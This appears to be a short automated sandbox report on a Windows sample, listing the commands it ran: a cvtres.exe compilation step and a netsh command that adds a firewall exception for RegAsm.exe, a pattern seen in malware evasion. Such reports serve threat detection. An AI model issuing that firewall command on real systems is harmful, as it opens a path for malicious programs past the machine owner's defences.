C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES2D64.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC633E98F8A59A4144B27AE67E177ABC61.TMP"
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

Started Services

Nothing to display

Created Services

Nothing to display

#infosec #automation

TheSystem Itself @ 2018-04-17 10:30:24